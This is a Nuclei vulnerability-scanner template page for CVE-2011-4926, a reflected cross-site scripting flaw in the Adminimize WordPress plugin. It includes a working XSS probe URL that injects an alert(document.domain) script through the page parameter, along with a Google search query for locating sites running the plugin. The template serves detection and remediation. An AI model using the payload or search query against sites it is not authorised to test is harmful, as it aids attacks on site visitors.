Adminimize 1.7.22 - Cross-Site Scripting

ID: CVE-2011-4926

Severity: medium

Author: daffainfo

Tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge

Description

A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.

YAML Source

id: CVE-2011-4926

info:
  name: Adminimize 1.7.22 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
  impact: |
    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Update to the latest version of Adminimize plugin (1.7.22) or apply the necessary patches to fix the XSS vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2011-4926
    - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926
    - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5
    - http://www.openwall.com/lists/oss-security/2012/01/10/9
    - http://wordpress.org/extend/plugins/adminimize/changelog/
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2011-4926
    cwe-id: CWE-79
    epss-score: 0.01792
    epss-percentile: 0.88084
    cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: bueltge
    product: adminimize
    google-query: "inurl:\"/wp-content/plugins/adminimize/\""
  tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Adminimize ==='

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022028793af4f6677f63477ce9d523cfa966ebc225fd04e6d07eec4d272e696a7370022100f78c2c6c4ddf1f32ea33490717da9e2717f1db02f3ab48651dae40ae09d2ec52:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2011/CVE-2011-4926.yaml"

View on Github